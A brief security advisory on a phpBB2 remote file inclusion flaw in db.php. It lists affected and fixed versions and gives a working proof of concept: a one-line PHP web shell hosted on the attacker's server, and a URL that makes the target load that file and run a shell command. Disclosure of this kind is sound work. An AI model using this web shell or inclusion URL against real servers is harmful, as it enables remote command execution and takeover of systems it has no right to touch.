|
|
| |
| The phpbb_root_path variable accepts scripts from external servers, which makes phpBB2 vulnerable to remote execution command using a custom script written by the attacker. |
| |
Credit:
This vulnerability was found by pokley and nullbyte.
|
| |
Vulnerable systems:
phpBB2 version 2.0 RC-3 and below
phpBB2 CVS version pre-18th March 2002
Immune systems:
phpBB2 2.0 RC-4
phpBB2 CVS version post-18th March
The "phpBB2 root path" variable accepts input from other web sites, and this enables remote attackers to execute arbitrary commands remotely.
The vulnerability lies in the fact that db.php accepts the following input:
'/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script'
Where the full_path_to_script can be a full URL from another web server.
For example, create a directory called 'db' on your web server. Now at this db directory create a file called 'mysql.txt' or 'mysql4.txt' or 'postgres.txt' (other file name don't seem to work).
This mysql.txt should contain this line:
<? echo "<pre>"; system($cmd); ?>
The next step is to type in the following URL in your browser:
http://example.com/phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a
You should get the 'uname result' of example.com
|
|
|
